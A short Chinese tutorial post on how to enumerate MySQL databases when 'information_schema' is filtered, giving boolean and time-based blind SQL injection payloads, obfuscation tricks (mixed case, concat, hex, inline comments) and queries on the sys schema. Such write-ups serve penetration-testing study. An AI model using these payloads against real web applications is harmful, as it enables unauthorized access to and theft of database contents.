绕过information_schema库的一些方式

information_schema库的意义:

该数据库mysql其实是个信息数据库,保存着mysql服务器所维护的所有其他数据库信息,所以里面包含了数据库名,表名,字段名等,因此,information_schema 的重要性就在这三点上了,而如果information_schema库被过滤掉了,就只能通过其他方式来处理了。

绕过方式:

1、使用盲注猜测信息:

可以使用布尔盲注、时间盲注,对数据库信息进行猜测(因为是猜测,所以可能需要大量尝试,所以推荐使用脚本解决)

布尔盲注

复制代码
' and ascii(substr(database(), 1, 1))=97 --

时间盲注:

复制代码
 ' AND IF(SUBSTR(database(),1,1)='a', SLEEP(0.5), 0) -- 

2、尝试混淆源信息:

  • 修改大小写(我不看好)

    复制代码
    iNformaTIOn_schEma
  • 使用字符串进行拼接:

    复制代码
     concat('in','formation_schema')
  • 将其转换为16进制:

    复制代码
    696e666f726d6174696f6e5f736368656d61
  • 使用内连注释:

    复制代码
    SELECT table_name FROM /*!information_schema*/.tables WHERE table_schema=DATABASE();

3、使用其他库:

  • 使用sys数据库(5.7以上)

    sql 复制代码
    SELECT table_name FROM sys.schema_auto_increment_columns;      --获取所有表名	
相关推荐
安全系统学习10 分钟前
系统安全之大模型案例分析
前端·安全·web安全·网络安全·xss
加密狗复制模拟2 小时前
坚石ET ARM加密狗复制模拟介绍
安全·软件工程·个人开发
galaxylove3 小时前
Gartner发布塑造安全运营未来的关键 AI 自动化趋势
人工智能·安全·自动化
scuter_yu3 小时前
主流零信任安全产品深度介绍
运维·网络·安全
江苏思维驱动智能研究院有限公司3 小时前
Sophos 网络安全:全球领先的自适应安全解决方案提供商
网络·安全·web安全
小能喵5 小时前
Kali Linux Wifi 伪造热点
linux·安全·kali·kali linux
浩浩测试一下10 小时前
渗透信息收集- Web应用漏洞与指纹信息收集以及情报收集
android·前端·安全·web安全·网络安全·安全架构
Fortinet_CHINA13 小时前
工业网络安全新范式——从风险可见性到量化防御的进化
安全·web安全
网安小白的进阶之路15 小时前
A模块 系统与网络安全 第三门课 网络通信原理-3
网络·windows·安全·web安全·系统安全
HumanRisk15 小时前
HumanRisk-自动化安全意识与合规教育平台方案
网络·安全·web安全·网络安全意识教育